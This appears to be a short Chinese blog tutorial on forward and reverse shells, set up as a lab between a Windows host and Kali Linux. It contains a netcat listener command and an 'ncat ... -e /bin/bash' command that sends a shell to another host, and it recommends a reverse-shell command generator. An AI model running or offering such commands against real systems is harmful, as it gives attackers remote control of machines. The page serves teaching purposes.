在shell反弹中我们会根据参照物的不同来区分正反shell反弹。
本次我们需要使用win和kali进行实验:
在shell反弹中我们需要在win上面安装netcat(瑞士军刀)用于可以执行监听指令。
下载指导链接https://blog.csdn.net/qq_40359932/article/details/105840295?ops_request_misc=%257B%2522request%255Fid%2522%253A%25226D84A75A-ED4E-402A-B21D-3E3D533916BD%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=6D84A75A-ED4E-402A-B21D-3E3D533916BD&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-105840295-null-null.142^v100^pc_search_result_base4&utm_term=win%E5%AE%89%E8%A3%85netcat&spm=1018.2226.3001.4187
kali中需要安装ncat确保指令的正确执行。
下载指令:
apt install ncat
对于windows的正反弹即是利用指令连接监听kali:
先开启我们的监听指令:
nc -lvvp 4433
指令中的4433代表我们监听的是4433端口,可以随意设置但是要确保两个指令的端口相同。
接下来在kali执行指令:
ncat 192.168.141.131 4433 -e /bin/bash
执行完指令之后尝试在win执行klai文件查看指令,可以执行这样就代表我们的win主机连接上了kali:
在这里面我们的win主机就是正向shell反弹,相对的对于kali而言就是反向shell反弹。反过来如果我们使用kali监听我们的win那么win就是反向shell而kali就是正向shell。
推荐一个生成shell指令的地方这样就不用自己去写指令方便些许:
棱角社区shell反弹指令生产
我们填写好我们的目标ip和端口后就可以自动生成相关指令。